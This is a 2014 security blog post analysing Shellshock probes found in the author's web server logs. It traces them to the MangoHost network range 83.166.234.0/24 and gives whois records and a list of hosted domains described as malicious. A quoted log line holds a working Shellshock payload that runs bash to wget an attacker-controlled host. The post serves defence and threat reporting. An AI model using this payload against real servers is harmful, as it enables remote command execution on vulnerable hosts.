Sponsored by..

Sunday 28 September 2014

Evil network: Shellshock and MangoHost (mangohost.net) / 83.166.234.0/24

I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday. I noticed that some cheeky b--stard was probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""
ad.dipaz.biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range, registered to:

inetnum:        83.166.234.0 - 83.166.234.255
netname:        MangoHost-Net
descr:          S.R.L. MangoHost Network
descr:          str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country:        MD
org:            ORG-SMN4-RIPE
admin-c:        VL6476-RIPE
tech-c:         VL6476-RIPE
status:         ASSIGNED PA
mnt-by:         RIM2000-MNT
notify:         noc@rim2000.ru
changed:        lukina@rim2000.ru 20140318
changed:        lukina@rim2000.ru 20140325
source:         RIPE

organisation:   ORG-SMN4-RIPE
org-name:       S.R.L. MangoHost Network
org-type:       OTHER
address:        str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail:         mangohostnetwork@gmail.com
abuse-c:        AR18923-RIPE
abuse-mailbox:  mangohostnetwork@gmail.com
mnt-ref:        CLOUDATAMD-MNT
mnt-by:         CLOUDATAMD-MNT
mnt-ref:        RIM2000-MNT
changed:        iuraqq@gmail.com 20140314
source:         RIPE

person:         Victor Letkovski
address:        T. Vladimirescu str 1/1 2024 Chisinau
phone:          +373 79 342393
nic-hdl:        VL6476-RIPE
mnt-by:         BSB-SERVICE-MNT
changed:        ripe@plusserver.de 20130520
source:         RIPE

% Information related to '83.166.234.0/24AS200019'

route:          83.166.234.0/24
descr:          S.R.L. MangoHost Network
origin:         AS200019
mnt-by:         RIM2000-MNT
changed:        lukina@rim2000.ru 20140319
source:         RIPE


MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.

Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).

Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:

for-your.biz
spr.for-your.biz
www.portw.org
1cpred.org
md1.vpn-service.us
jab.darkode.com
cappellina.com
ieplugins.net
ie-plugin.com
ie-addon.com
flanbase.org
porndays.org
allestic.org
shreqads.org
cpmjunction.org
indexcpm.org
friscoserve43.com
secsoncpm.com
clickcenter98.com
clickfunder81.com
adcountservices.com
ad.serverflamerstf.com
sfecpm.com
dialaclick.com
consultant-fond.ru
promo-consultin.ru
fond-consult.ru
rusinconsult.ru
yugconsalting.ru
partnersconsult.ru
buhsupport.biz
s2.futurevideo.su
s3.futurevideo.su
s4.futurevideo.su
tedaciokero.in
security-05znsa.pw
security-police5qnsa.pw
alert24world4xi.us
security-d07nsa.co.uk
security-g02nsa.co.uk
security-d07nsa.us
security-alert-nsacr.us
kubikrubik.me
ns1.kubikrubik.me
ns2.kubikrubik.me
ns2.kubikrubik.me
babulya.biz
ad.evhomebusiness.com
ad.emanuelecontractor.com
ad.theglamzsophisticate.com
ad.icanknittoo.info
smtp.gschultz.com
bounce.gschultz.com
smtp.agoodline.com
bounce.agoodline.com
smtp.ashlandmo.com
bounce.ashlandmo.com
smtp.circuitciy.com
bounce.circuitciy.com
ns2.hnnoceacecs.ru
ns2.jnojgnsecas.ru
ns2.jincoeacsc.ru
ns2.jnigunsecs.ru
zaconhelp.ru
pro-yurist.ru
yuristvsem.ru
zakon-vsem.ru
advocat4all.ru
pro-advocat.ru
yurist-info.ru
yuristzakon.ru
zakon-prost.ru
advocat-vsem.ru
advokat-prof.ru
jurist-otvet.ru
power-yurist.ru
pravomagistr.ru
zakon-yurist.ru
zakon-znatok.ru
zakonmagistr.ru
jurist-zabota.ru
yurist-vopros.ru
yurist-znatok.ru
advocat-jurist.ru
advocat-zakoni.ru
advokatura-pro.ru
pravoved-zakon.ru
pravovoiyurist.ru
yurist-protect.ru
yuristprozakon.ru
zakonhelponline.ru
pravoved-consult.ru
pravovoi-consultant.ru
analofday.com
www.analofday.com
ad.mobiplaystore.us
ad.glenlevit.us
ad.rioresults.us
ad.seojunctionaire.us
ad.directsign.us
ad.dipad.biz
ad.truestream.biz
ad.adrealmedia.biz
freelivepornwebcams.com

I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.

No comments: